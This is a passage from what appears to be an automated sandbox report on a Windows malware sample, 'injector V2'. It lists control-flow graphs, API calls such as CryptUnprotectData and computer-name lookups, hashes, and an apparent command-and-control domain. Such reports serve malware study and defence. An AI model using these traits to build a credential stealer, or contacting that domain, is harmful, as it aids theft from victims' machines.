19517 43d1b0 RtlFreeHeap 19515->19517 19520 43fac0 LdrInitializeThunk 19515->19520 19517->19515 19518->19504 19519->19511 19520->19515 19521->19513 19522 41a4da 19523 41a4e0 19522->19523 19524 442370 LdrInitializeThunk 19523->19524 19525 41a62d 19524->19525 19526 41a90a 19525->19526 19527 41a695 19525->19527 19528 4426f0 LdrInitializeThunk 19525->19528 19530 41a6d6 19525->19530 19532 41a7de 19525->19532 19534 41a7e0 19525->19534 19527->19526 19529 4427d0 LdrInitializeThunk 19527->19529 19527->19530 19527->19532 19528->19527 19529->19530 19530->19526 19530->19532 19558 43fac0 LdrInitializeThunk 19530->19558 19532->19526 19533 41aac3 CryptUnprotectData 19532->19533 19532->19534 19533->19534 19535 41b027 19534->19535 19539 41b0fd 19534->19539 19559 41ebf0 19534->19559 19535->19539 19541 43b350 19535->19541 19540 41b3e1 19540->19539 19550 43d260 19540->19550 19562 442b00 19541->19562 19545 43b396 19548 43b3d3 19545->19548 19574 443580 19545->19574 19546 43b45e 19546->19540 19548->19546 19582 43fac0 LdrInitializeThunk 19548->19582 19551 43d290 19550->19551 19554 43d2ee 19551->19554 19588 43fac0 LdrInitializeThunk 19551->19588 19552 43d4d1 19552->19540 19554->19552 19555 43d3de 19554->19555 19589 43fac0 LdrInitializeThunk 19554->19589 19556 43d1b0 RtlFreeHeap 19555->19556 19556->19552 19558->19532 19560 41ec15 19559->19560 19561 4190d0 RtlFreeHeap LdrInitializeThunk 19560->19561 19561->19560 19564 442b20 19562->19564 19563 43b36c 19563->19546 19566 442f40 19563->19566 19564->19563 19583 43fac0 LdrInitializeThunk 19564->19583 19567 442f70 19566->19567 19571 442fce 19567->19571 19584 43fac0 LdrInitializeThunk 19567->19584 19568 443244 19568->19545 19570 43d1b0 RtlFreeHeap 19570->19568 19571->19568 19573 44309e 19571->19573 19585 43fac0 LdrInitializeThunk 19571->19585 19573->19570 19575 44358f 19574->19575 19578 44366e 19575->19578 19586 43fac0 LdrInitializeThunk 19575->19586 19576 443861 19576->19548 19578->19576 19580 4437ae 19578->19580 19587 43fac0 LdrInitializeThunk 19578->19587 19579 43d1b0 RtlFreeHeap 19579->19576 19580->19579 19582->19546 19583->19563 19584->19571 19585->19573 19586->19578 19587->19580 19588->19554 19589->19555 19590 42e29c 19591 42e2b5 19590->19591 19594 43a760 19591->19594 19595 43a76e 19594->19595 19597 43a857 19595->19597 19603 43fac0 LdrInitializeThunk 19595->19603 19599 42fd4a 19597->19599 19600 43a95b 19597->19600 19602 43fac0 LdrInitializeThunk 19597->19602 19600->19599 19604 43fac0 LdrInitializeThunk 19600->19604 19602->19597 19603->19595 19604->19600

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 43aae0-43ab3f 1 43ab40-43ab73 0->1 1->1 2 43ab75-43ab8c 1->2 4 43ab96-43abe4 CoCreateInstance 2->4 5 43ab8e 2->5 6 43afb5-43afda call 441930 GetVolumeInformationW 4->6 7 43abea-43ac1f 4->7 5->4 12 43afe3-43afe5 6->12 13 43afdc-43afdf 6->13 8 43ac20-43ac45 7->8 8->8 10 43ac47-43ac79 SysAllocString 8->10 18 43afa1-43afb1 SysFreeString 10->18 19 43ac7f-43ac99 CoSetProxyBlanket 10->19 14 43affd-43b004 12->14 13->12 16 43b010-43b053 call 421050 14->16 17 43b006-43b00d 14->17 25 43b060-43b068 16->25 17->16 18->6 21 43af97-43af9d 19->21 22 43ac9f-43acbf 19->22 21->18 24 43acc0-43ad06 22->24 24->24 26 43ad08-43ad7f SysAllocString 24->26 25->25 27 43b06a-43b078 25->27 28 43ad80-43ad92 26->28 29 43aff0-43aff7 27->29 30 43b07e-43b08e call 408600 27->30 28->28 31 43ad94-43adb9 SysAllocString 28->31 29->14 32 43b093-43b09a 29->32 30->29 36 43af81-43af93 SysFreeString * 2 31->36 37 43adbf-43ade1 31->37 36->21 39 43af77-43af7d 37->39 40 43ade7-43adea 37->40 39->36 40->39 41 43adf0-43adf5 40->41 41->39 42 43adfb-43ae54 VariantInit 41->42 43 43ae60-43ae91 42->43 43->43 44 43ae93-43aea1 43->44 45 43aea5-43aea7 44->45 46 43af66-43af73 VariantClear 45->46 47 43aead-43aeb3 45->47 46->39 47->46 48 43aeb9-43aec7 47->48 49 43aec9-43aece 48->49 50 43aefd 48->50 52 43aedc-43aee0 49->52 51 43aeff-43af27 call 4083e0 call 4302d0 50->51 63 43af29 51->63 64 43af2e-43af3a 51->64 53 43aee2-43aeeb 52->53 54 43aed0 52->54 57 43aef2-43aef6 53->57 58 43aeed-43aef0 53->58 56 43aed1-43aeda 54->56 56->51 56->52 57->56 60 43aef8-43aefb 57->60 58->56 60->56 63->64 65 43af41-43af64 call 408410 call 4083f0 64->65 66 43af3c 64->66 65->46 66->65
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00445678,00000000,00000001,00445668,00000000), ref: 0043ABDC
                                                                          • SysAllocString.OLEAUT32 ref: 0043AC48
                                                                          • CoSetProxyBlanket.COMBASE(899A8F55,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043AC91
                                                                          • SysAllocString.OLEAUT32 ref: 0043AD0B
                                                                          • SysAllocString.OLEAUT32 ref: 0043AD95
                                                                          • VariantInit.OLEAUT32(?), ref: 0043AE00
                                                                          • VariantClear.OLEAUT32(?), ref: 0043AF67
                                                                          • SysFreeString.OLEAUT32(?), ref: 0043AF8B
                                                                          • SysFreeString.OLEAUT32(?), ref: 0043AF91
                                                                          • SysFreeString.OLEAUT32(?), ref: 0043AFA5
                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043AFD6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                          • String ID: 2zS$C$HI$Q:$R[$\$dW$e]
                                                                          • API String ID: 2573436264-720759029
                                                                          • Opcode ID: 5e6b082e055db898b934fdf9197fefba6d39db0357bb15cc51210463bf387c1e
                                                                          • Instruction ID: 6a22e06d1f4fc05d6b78d4c42da141d52bebcac01b0d814cd6b9e62af6d90257
                                                                          • Opcode Fuzzy Hash: 5e6b082e055db898b934fdf9197fefba6d39db0357bb15cc51210463bf387c1e
                                                                          • Instruction Fuzzy Hash: D8E1FBB5A48300AFE710DF24CC85B1BBBA4EF89714F04892DFAD49B291D779D805CB96
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $).)($2$<=$qt$xO
                                                                          • API String ID: 0-2945988728
                                                                          • Opcode ID: daf83befbd94119a431a41a0e334e64bfc8055be805bde0319cf7fce25fe707e
                                                                          • Instruction ID: 5e4571ce5de428b667a4c3889c18ec17afe0a2c9bbb95f7033fde70e5cca42b9
                                                                          • Opcode Fuzzy Hash: daf83befbd94119a431a41a0e334e64bfc8055be805bde0319cf7fce25fe707e
                                                                          • Instruction Fuzzy Hash: 9892EFB15093818BD730CF28D8957EBB7E1EF95314F04492DE4C98B292EB389955CB8A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 461 426618-42661e 462 426620-426625 461->462 463 426627 461->463 464 42662a-42664a call 4083e0 462->464 463->464 468 426651 464->468 469 426659-426662 464->469 468->469 470 426664-426669 469->470 471 42666b 469->471 472 426672-4266bb call 4083e0 470->472 471->472 475 4266c0-426722 472->475 475->475 476 426724-42672f 475->476 477 426751-42675e 476->477 478 426731-426739 476->478 480 426760-426764 477->480 481 426781-426799 call 442530 477->481 479 426740-42674f 478->479 479->477 479->479 482 426770-42677f 480->482 485 4267a0 481->485 486 426940-426946 call 4083f0 481->486 487 4267b6-4267bf 481->487 488 4267a6-4267ad 481->488 489 42693a 481->489 490 426928-426932 481->490 491 42694f-426a07 481->491 492 426a7d-426a95 481->492 493 426b7d 481->493 482->481 482->482 485->488 486->491 497 4267c1-4267c6 487->497 498 4267c8 487->498 488->487 489->486 490->489 495 426a10-426a5b 491->495 496 426aa0-426ab2 492->496 501 426b83 493->501 495->495 502 426a5d-426a6d call 424860 495->502 496->496 503 426ab4-426b3f 496->503 499 4267cf-426878 call 4083e0 497->499 498->499 512 426880-4268a6 499->512 508 426b89-426b92 call 4083f0 501->508 509 426a72-426a75 502->509 506 426b40-426b54 503->506 506->506 510 426b56-426b75 call 4243f0 506->510 519 426ba0-426ba6 call 4083f0 508->519 509->492 510->493 512->512 515 4268a8-4268b3 512->515 517 4268d1-4268de 515->517 518 4268b5-4268bf 515->518 521 4268e0-4268e4 517->521 522 426901-426921 GetLogicalDrives call 442530 517->522 520 4268c0-4268cf 518->520 530 426baf 519->530 520->517 520->520 524 4268f0-4268ff 521->524 522->486 522->489 522->490 522->492 522->493 522->501 522->508 522->519 528 426bc0-426bcc 522->528 529 426bb5-426bbd call 4083f0 522->529 522->530 524->522 524->524 529->528 530->529
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: I=[;$\]$k8i$sq$wu
                                                                          • API String ID: 0-747998150
                                                                          • Opcode ID: 28cb73d1d0cc02d36672ee1a977835a0d48102061fa2e91f5168a448183b0567
                                                                          • Instruction ID: 955b5eedd81a2d287b6b2a0a7049552ade770855a1e15c3bb6f3f8b93f456ae3
                                                                          • Opcode Fuzzy Hash: 28cb73d1d0cc02d36672ee1a977835a0d48102061fa2e91f5168a448183b0567
                                                                          • Instruction Fuzzy Hash: 64D1DCB46183408FD7109F69E89162BBBF0EF96754F048A2DF8D58B351E778C905CB8A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 533 408c70-408c81 call 43e700 536 408e47-408e49 ExitProcess 533->536 537 408c87-408c9f SHGetSpecialFolderPathW call 437a70 533->537 540 408e42 call 43fa10 537->540 541 408ca5-408cc3 GetCurrentThreadId 537->541 540->536 542 408cc5 541->542 543 408cc7-408cd2 541->543 542->543 545 408cd4 543->545 546 408cd6-408ce5 543->546 545->546 547 408ce7 546->547 548 408ce9-408cf4 546->548 547->548 549 408cf6 548->549 550 408cf8-408da2 GetCurrentProcessId GetForegroundWindow 548->550 549->550 551 408da4-408e14 550->551 552 408e1e-408e36 call 40a020 550->552 553 408e16-408e18 551->553 554 408e1a-408e1c 551->554 552->540 557 408e38 call 40d2b0 552->557 553->554 554->552 559 408e3d call 40b930 557->559 559->540
                                                                          APIs
                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408C92
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00408CA5
                                                                          • GetCurrentProcessId.KERNEL32 ref: 00408CF8
                                                                          • GetForegroundWindow.USER32 ref: 00408D9A
                                                                          • ExitProcess.KERNEL32 ref: 00408E49
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                          • String ID:
                                                                          • API String ID: 4063528623-0
                                                                          • Opcode ID: 852f3edec621cee46796513dd3379348b33cbdda8d5f3486ffea238e5156b6f1
                                                                          • Instruction ID: 3275e4ff3b5ca12b3e474162ec97628056a9dc461025b04eb439f991107217f1
                                                                          • Opcode Fuzzy Hash: 852f3edec621cee46796513dd3379348b33cbdda8d5f3486ffea238e5156b6f1
                                                                          • Instruction Fuzzy Hash: E7412937B0471C1BD714AABADD4A396B6C55BC5314F09943EADC4EB3D2ED7C8C058298

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 561 42e398-42e3c5 562 42e3d0-42e411 561->562 562->562 563 42e413-42e41f 562->563 564 42e421-42e427 563->564 565 42e43b-42efbf 563->565 566 42e430-42e439 564->566 568 42efc0-42f02e 565->568 566->565 566->566 568->568 569 42f030-42f039 568->569 570 42f03b-42f044 569->570 571 42f05d 569->571 572 42f050-42f059 570->572 573 42f060-42f06c 571->573 572->572 574 42f05b 572->574 575 42f081-42f0a0 call 441930 573->575 576 42f06e 573->576 574->573 579 42f0a5-42f0c4 GetPhysicallyInstalledSystemMemory call 421050 575->579 578 42f070-42f07d 576->578 578->578 580 42f07f 578->580 582 42f0c9-42f0ef 579->582 580->575 583 42f0f0-42f132 582->583 583->583 584 42f134-42f16f 583->584 585 42f170-42f195 584->585 585->585 586 42f197-42f1a0 585->586 587 42f1a2-42f1ab 586->587 588 42f1bd 586->588 589 42f1b0-42f1b9 587->589 590 42f1c0-42f1ca 588->590 589->589 591 42f1bb 589->591 592 42f1db-42f1e7 590->592 593 42f1cc-42f1cf 590->593 591->590 594 42f1fb-42f25b 592->594 595 42f1e9-42f1ef 592->595 596 42f1d0-42f1d9 593->596 598 42f260-42f2ad 594->598 597 42f1f0-42f1f9 595->597 596->592 596->596 597->594 597->597 598->598 599 42f2af-42f2b8 598->599 600 42f2ba 599->600 601 42f2cb-42f2d7 599->601 602 42f2c0-42f2c9 600->602 603 42f2eb-42f380 601->603 604 42f2d9-42f2df 601->604 602->601 602->602 605 42f2e0-42f2e9 604->605 605->603 605->605
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: hzQ$A0*#$_mQ#
                                                                          • API String ID: 0-649192675
                                                                          • Opcode ID: f82d120e8af8be456788801ec164f23a3b2fb0dbebe9317c1cc6ae22e21d26cd
                                                                          • Instruction ID: 4b5523de8a74e22659b03f91f74dabd82eea3889a317e08ffc949688807c81c0
                                                                          • Opcode Fuzzy Hash: f82d120e8af8be456788801ec164f23a3b2fb0dbebe9317c1cc6ae22e21d26cd
                                                                          • Instruction Fuzzy Hash: 39D1D671604B918FD729CF39C4607A3BBE2AF96304F5889BEC4DB8B742D67964098B14

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 606 42ef87-42efbf call 434ef0 call 4083f0 612 42efc0-42f02e 606->612 612->612 613 42f030-42f039 612->613 614 42f03b-42f044 613->614 615 42f05d 613->615 616 42f050-42f059 614->616 617 42f060-42f06c 615->617 616->616 618 42f05b 616->618 619 42f081-42f0c4 call 441930 GetPhysicallyInstalledSystemMemory call 421050 617->619 620 42f06e 617->620 618->617 626 42f0c9-42f0ef 619->626 622 42f070-42f07d 620->622 622->622 624 42f07f 622->624 624->619 627 42f0f0-42f132 626->627 627->627 628 42f134-42f16f 627->628 629 42f170-42f195 628->629 629->629 630 42f197-42f1a0 629->630 631 42f1a2-42f1ab 630->631 632 42f1bd 630->632 633 42f1b0-42f1b9 631->633 634 42f1c0-42f1ca 632->634 633->633 635 42f1bb 633->635 636 42f1db-42f1e7 634->636 637 42f1cc-42f1cf 634->637 635->634 638 42f1fb-42f25b 636->638 639 42f1e9-42f1ef 636->639 640 42f1d0-42f1d9 637->640 642 42f260-42f2ad 638->642 641 42f1f0-42f1f9 639->641 640->636 640->640 641->638 641->641 642->642 643 42f2af-42f2b8 642->643 644 42f2ba 643->644 645 42f2cb-42f2d7 643->645 646 42f2c0-42f2c9 644->646 647 42f2eb-42f380 645->647 648 42f2d9-42f2df 645->648 646->645 646->646 649 42f2e0-42f2e9 648->649 649->647 649->649
                                                                          APIs
                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F0AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                          • String ID: hzQ$A0*#$_mQ#
                                                                          • API String ID: 3960555810-649192675
                                                                          • Opcode ID: a8d4071317d906274c3a83410b64c27f8784fe66ad683627aac9826f0132bf2f
                                                                          • Instruction ID: cc1b18adca05992d375270c8dca019abda7103aa00f9c2d6f365f8d9dd4ca47d
                                                                          • Opcode Fuzzy Hash: a8d4071317d906274c3a83410b64c27f8784fe66ad683627aac9826f0132bf2f
                                                                          • Instruction Fuzzy Hash: 15B1D571604B518FD739CF35C4607A3BBE2AF96304F5889BEC0DB8B642D6796409CB15

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 694 40ad50-40ad88 695 40ad90-40adc1 694->695 695->695 696 40adc3-40aed1 695->696 697 40aee0-40af0f 696->697 697->697 698 40af11-40af3f 697->698 699 40af40-40af71 698->699 699->699 700 40af73-40af8a call 40b960 699->700 702 40af8f-40af94 700->702 703 40b094-40b096 702->703 704 40af9a-40afa7 702->704 705 40b26a-40b276 703->705 706 40afb0-40afd5 704->706 706->706 707 40afd7-40afdf 706->707 708 40afe0-40afea 707->708 709 40aff1-40aff5 708->709 710 40afec-40afef 708->710 711 40b261-40b267 call 43d1b0 709->711 712 40affb-40b015 709->712 710->708 710->709 711->705 713 40b020-40b05b 712->713 713->713 715 40b05d-40b066 713->715 717 40b068-40b06e 715->717 718 40b09b-40b09f 715->718 721 40b077-40b07b 717->721 719 40b0a5-40b0d2 718->719 720 40b25f 718->720 722 40b0e0-40b142 719->722 720->711 721->720 723 40b081-40b088 721->723 722->722 724 40b144-40b150 722->724 725 40b08a-40b08c 723->725 726 40b08e 723->726 727 40b152-40b15c 724->727 728 40b184-40b188 724->728 725->726 729 40b070-40b075 726->729 730 40b090-40b092 726->730 731 40b167-40b16b 727->731 728->720 732 40b18e-40b1ab 728->732 729->718 729->721 730->729 731->720 733 40b171-40b178 731->733 734 40b1b0-40b1e5 732->734 735 40b17a-40b17c 733->735 736 40b17e 733->736 734->734 737 40b1e7-40b1f1 734->737 735->736 738 40b160-40b165 736->738 739 40b180-40b182 736->739 740 40b230-40b232 737->740 741 40b1f3-40b202 737->741 738->728 738->731 739->738 742 40b23c-40b25d call 40aae0 740->742 743 40b217-40b21b 741->743 742->711 743->720 744 40b21d-40b224 743->744 746 40b226-40b228 744->746 747 40b22a 744->747 746->747 749 40b210-40b215 747->749 750 40b22c-40b22e 747->750 749->743 751 40b234-40b23a 749->751 750->749 751->720 751->742
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HI$]ik$jqrs$ojz.$|xtr
                                                                          • API String ID: 0-1770020635
                                                                          • Opcode ID: f17d1536b8c2fdb34f57ab9c525659b88955117aa48b02a413fd2239fbc03639
                                                                          • Instruction ID: 67785220b70f3827788cb6707d2b0f55683535bf9b43b1d54505208aed880647
                                                                          • Opcode Fuzzy Hash: f17d1536b8c2fdb34f57ab9c525659b88955117aa48b02a413fd2239fbc03639
                                                                          • Instruction Fuzzy Hash: E3D149716483808BD314CF25C49136FBBE2EBD6354F28893DE4E55B391D779880ACB8A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 650 409ae0-409aee 651 409fd0 650->651 652 409af4-409b6f call 406200 call 4083e0 650->652 653 409fd2-409fde 651->653 658 409b70-409b8e 652->658 658->658 659 409b90-409baf call 4093b0 658->659 662 409bb0-409be8 659->662 662->662 663 409bea-409c13 call 4093b0 662->663 666 409c20-409c34 663->666 666->666 667 409c36-409c7e call 4093b0 666->667 670 409c80-409cbc 667->670 670->670 671 409cbe-409cd3 670->671 672 409ce0-409d27 671->672 672->672 673 409d29-409d63 call 4093b0 672->673 676 409d70-409d94 673->676 676->676 677 409d96-409e71 call 4096a0 676->677 680 409e80-409e9e 677->680 680->680 681 409ea0-409ea8 680->681 682 409ed1-409edc 681->682 683 409eaa-409eb2 681->683 685 409f01-409f34 682->685 686 409ede-409ee1 682->686 684 409ec0-409ecf 683->684 684->682 684->684 688 409f40-409f89 685->688 687 409ef0-409eff 686->687 687->685 687->687 688->688 689 409f8b-409fa4 call 40c5a0 688->689 691 409fa9-409fce call 4083f0 689->691 691->653
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: -y{$E8521D1DD42FF4D4FF1C6333321FCDD9$XY$nhfn$nhfn
                                                                          • API String ID: 0-850811466
                                                                          • Opcode ID: de60a6e6b5a6f87dfc5846c1ef3a913909ff0d3018fa24760a7ac9a99148e2fd
                                                                          • Instruction ID: 8546714cd44759a876fd9954fd71d7a29741ca27fa0afc8555a1076a2539836e
                                                                          • Opcode Fuzzy Hash: de60a6e6b5a6f87dfc5846c1ef3a913909ff0d3018fa24760a7ac9a99148e2fd
                                                                          • Instruction Fuzzy Hash: 2CC101B15083408FD718DF35D89176BBBE5EB81318F284A2DE5D18B392D739C909CB9A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 752 42f3ed-42f448 call 441930 GetComputerNameExA 755 42f450-42f4a7 752->755 755->755 756 42f4a9-42f4b2 755->756 757 42f4b4-42f4bf 756->757 758 42f4cd 756->758 760 42f4c0-42f4c9 757->760 759 42f4d0-42f4dc 758->759 761 42f4fb-42f55a GetComputerNameExA 759->761 762 42f4de-42f4e4 759->762 760->760 763 42f4cb 760->763 765 42f560-42f595 761->765 764 42f4f0-42f4f9 762->764 763->759 764->761 764->764 765->765 766 42f597-42f5a0 765->766 767 42f5a2-42f5a8 766->767 768 42f5bb-42f5c7 766->768 769 42f5b0-42f5b9 767->769 770 42f5db-42f63b 768->770 771 42f5c9-42f5cf 768->771 769->768 769->769 774 42f640-42f667 770->774 772 42f5d0-42f5d9 771->772 772->770 772->772 774->774 775 42f669-42f672 774->775 776 42f674-42f67f 775->776 777 42f68d 775->777 778 42f680-42f689 776->778 779 42f68f-42f69b 777->779 778->778 780 42f68b 778->780 781 42f6bb-42f71a call 441930 779->781 782 42f69d-42f6a3 779->782 780->779 787 42f720-42f73a 781->787 783 42f6b0-42f6b9 782->783 783->781 783->783 787->787 788 42f73c-42f745 787->788 789 42f747-42f74f 788->789 790 42f75b-42f76b 788->790 791 42f750-42f759 789->791 792 42f880-42f8c9 790->792 793 42f771-42f77b 790->793 791->790 791->791 795 42f8d0-42f8fb 792->795 794 42f780-42f78a 793->794 796 42f7a0-42f7a6 794->796 797 42f78c-42f791 794->797 795->795 798 42f8fd-42f90b 795->798 800 42f7d0-42f7df 796->800 801 42f7a8-42f7ab 796->801 799 42f830-42f834 797->799 802 42f92b-42f931 call 433610 798->802 803 42f90d-42f913 798->803 809 42f836-42f83e 799->809 806 42f7e1-42f7e4 800->806 807 42f84a-42f852 800->807 801->800 804 42f7ad-42f7c2 801->804 812 42f936-42f955 802->812 805 42f920-42f929 803->805 804->799 805->802 805->805 806->807 811 42f7e6-42f82f 806->811 807->809 810 42f854-42f857 807->810 809->792 813 42f840-42f842 809->813 814 42f859-42f87a 810->814 815 42f87c-42f87e 810->815 811->799 813->794 816 42f848 813->816 814->799 815->799 816->792
                                                                          APIs
                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042F41E
                                                                          • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042F51B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerName
                                                                          • String ID: Y)|z
                                                                          • API String ID: 3545744682-2475117699
                                                                          • Opcode ID: 97f176c82be860e80e99d39f12832de0245f955d9c8c03626df489495b74472d
                                                                          • Instruction ID: fc74388107325e7a7c6ff9d84f917176910edaac6ddaad0849e3e7f43fdaff55
                                                                          • Opcode Fuzzy Hash: 97f176c82be860e80e99d39f12832de0245f955d9c8c03626df489495b74472d
                                                                          • Instruction Fuzzy Hash: EBE10520604B918EE7258F39C4517A3FBE19F57304F88897EC0EB87392D778A50ACB65

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 872 40da8d-40dad2 call 4354c0 call 409ae0 CoUninitialize 877 40dae0-40db0e 872->877 877->877 878 40db10-40db3b 877->878 879 40db40-40db76 878->879 879->879 880 40db78-40dbe9 879->880 881 40dbf0-40dc39 880->881 881->881 882 40dc3b-40dc4c 881->882 883 40dc6b-40dc73 882->883 884 40dc4e-40dc5f 882->884 886 40dc75-40dc7a 883->886 887 40dc8d 883->887 885 40dc60-40dc69 884->885 885->883 885->885 888 40dc80-40dc89 886->888 889 40dc91-40dc9e 887->889 888->888 890 40dc8b 888->890 891 40dca0-40dca7 889->891 892 40dcbb-40dcc3 889->892 890->889 893 40dcb0-40dcb9 891->893 894 40dcc5-40dcc6 892->894 895 40dcdb-40dce5 892->895 893->892 893->893 896 40dcd0-40dcd9 894->896 897 40dce7-40dceb 895->897 898 40dcfb-40dd07 895->898 896->895 896->896 899 40dcf0-40dcf9 897->899 900 40dd21-40de4f 898->900 901 40dd09-40dd0b 898->901 899->898 899->899 903 40de50-40de8e 900->903 902 40dd10-40dd1d 901->902 902->902 904 40dd1f 902->904 903->903 905 40de90-40debb 903->905 904->900 906 40dec0-40dedf 905->906 906->906 907 40dee1-40df0b call 40b960 906->907 909 40df10-40df2a 907->909
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Uninitialize
                                                                          • String ID: frogs-severz.sbs$~
                                                                          • API String ID: 3861434553-158077946
                                                                          • Opcode ID: d5220d5670e1708917e11342a028b34298afbc7a44c78ac7098a28b1d0f5f590
                                                                          • Instruction ID: 1722d432d9f0582b287e1da6689c6b31669ffb2262be362835be31b09a1d3302
                                                                          • Opcode Fuzzy Hash: d5220d5670e1708917e11342a028b34298afbc7a44c78ac7098a28b1d0f5f590
                                                                          • Instruction Fuzzy Hash: 6CB1227550D3D18AE334CF25C4883ABBBE1AFD6304F18496DC4C96B392DB78850ACB96

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 931 40b97e-40bb6f 932 40bb70-40bbc4 931->932 932->932 933 40bbc6-40bdf5 932->933 935 40be00-40be54 933->935 935->935 936 40be56-40be5e 935->936 937 40be64-40be7f 936->937
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \^$fW
                                                                          • API String ID: 0-3607370474
                                                                          • Opcode ID: 421771a58df8ca6a154e1360e36a12261740e9a2c7fb950996592df75256efd9
                                                                          • Instruction ID: 10e2d8c8b8817ea46bc7347159ddd5c78d5c368216ceac52f0a264783e73b741
                                                                          • Opcode Fuzzy Hash: 421771a58df8ca6a154e1360e36a12261740e9a2c7fb950996592df75256efd9
                                                                          • Instruction Fuzzy Hash: EFC15FB09103048FE754DF56D989BA97FB2FB46210F6A81EAD4986F376D7308401CF96
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: >>
                                                                          • API String ID: 0-1736523924
                                                                          • Opcode ID: 7af8eb769a22ffdd9c16f70ad9e8ac92724860ad1783acaeed051abb327547b5
                                                                          • Instruction ID: 7c71d9d39e9233a4463e6bb1d4aa4fb52488a76a512af14323cd7b14f7bf25fd
